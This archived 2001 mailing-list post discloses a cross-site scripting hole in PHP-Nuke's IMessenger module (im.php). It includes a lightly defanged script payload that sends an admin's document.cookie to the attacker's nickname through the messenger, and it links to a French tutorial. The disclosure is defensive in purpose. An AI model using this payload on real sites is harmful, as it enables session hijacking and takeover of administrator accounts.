Security hole in IMessenger ( PHP-Nuke )

From: frog frog (leseulfrogat_private)
Date: Sat Dec 15 2001 - 05:45:29 PST

Next message: Jarek Durak: "Re: Win XP IP address hijack?"

Previous message: Steve De Doncker: "Re: proxy tool"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) There is a big hole in imessenger (im.php). He accept javascript... if I send <*s*cript>window.location.href='http://www. [SERVER].com/im.php?username_to= [MY_NICK] &subject='+ document.cookie +'&message=message&action=send' ;</script> (without '*') to the admin, he send his cookie. PHPNuke has been alerted. There's a tut (french) here : http://balteam.multimania.com/Tuts/imhole.txt frog-m@n

Next message: Jarek Durak: "Re: Win XP IP address hijack?"
Previous message: Steve De Doncker: "Re: proxy tool"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Dec 15 2001 - 08:54:36 PST